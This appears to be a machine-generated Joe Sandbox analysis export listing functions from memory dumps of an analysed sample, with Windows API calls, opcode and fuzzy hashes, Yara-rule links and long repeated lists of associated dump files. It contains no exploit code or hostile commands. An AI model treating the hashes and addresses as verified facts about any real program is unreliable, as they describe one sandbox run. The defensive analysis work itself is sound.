Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6ec00171d967211df65d0b6e946ce487b4ff4d62a9edeeeb385a250d901c8287
Instruction ID: 1a6e86cdec9b4aad4e89af7611a067d7d5caf9f7c53d9ace9f0f76ff871dc7e1
Opcode Fuzzy Hash: 6ec00171d967211df65d0b6e946ce487b4ff4d62a9edeeeb385a250d901c8287
Instruction Fuzzy Hash: BFF0E232A4522466EB213A72BC01B5B3759DF857B0F188121FD08A7181DA64FC01B6E0

Function 00F087B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00F0DA1D,?,?,?,?), ref: 00F087B9

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cd531ed746151a8d8cb65ec525d691744582dd348efeec25e7b509aaa20f6db5
Instruction ID: bb84976455b6bd627c491cf007a617490bed16557a4fcac760b9c51253a221d3
Opcode Fuzzy Hash: cd531ed746151a8d8cb65ec525d691744582dd348efeec25e7b509aaa20f6db5
Instruction Fuzzy Hash: 91C08C2811260047EE2C0538809A8A933094A8B7F43F41B88E4F04B1E5CA355847F711

Function 00F087B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00F0DA1D,?,?,?,?), ref: 00F087B9

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 956f43535f41ad7ee30488d51c131e2e006af46e87474491b069ff284b7e896b
Instruction ID: bdc14242405d4a6e06b63d4101ca59bf24b2c9d677e3e02406905fbddedb0c09
Opcode Fuzzy Hash: 956f43535f41ad7ee30488d51c131e2e006af46e87474491b069ff284b7e896b
Instruction Fuzzy Hash: B0C08C3811220087EB2C4A38909986932099A877B83F00B9CE4F14B1E5CB32C443FBA1

Function 00F0B1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F0B3C8

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a548793cce04ff134f560b7e37265e85d654be4cfa174afa22b38f68b27cf573
Instruction ID: f86689a0e72227a1203fe04218cf687a555d534debf04f39a380968471487b53
Opcode Fuzzy Hash: a548793cce04ff134f560b7e37265e85d654be4cfa174afa22b38f68b27cf573
Instruction Fuzzy Hash: 63B10670A10268DFEB29CF14CD94BDEBBB5EF15304F5085D8E809A7281D775AA88DF90

Function 05080C95 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699539569.0000000005080000.00000040.00001000.00020000.00000000.sdmp, Offset: 05080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5080000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25a6fed01570dcbd401c8616d8adef4e2aa1dd9d8da7b979b50268ed7546aa4
Instruction ID: 0bf33e4820669933ef764054c78ab70277dd72533e197a8f8588e4b720c0bc53
Opcode Fuzzy Hash: a25a6fed01570dcbd401c8616d8adef4e2aa1dd9d8da7b979b50268ed7546aa4
Instruction Fuzzy Hash: 3FF022EB20D120BCF201E1623B2CDFF6BAED5C3730730843AF882C6842D289094D6032

Non-executed Functions

Function 00F431A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00F43323

Strings

1#SNAN, xrefs: 00F444BA
1#IND, xrefs: 00F444B3
1#INF, xrefs: 00F444DE
1#QNAN, xrefs: 00F444C1

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 72c1ca759bbf7223530fc04198905997f771d27be583f978de4efc12c21d5dc1
Instruction ID: aaee9bf0a0fa28e2972df82fc6a54394c93fa73ee848407b1b904f69ee057f79
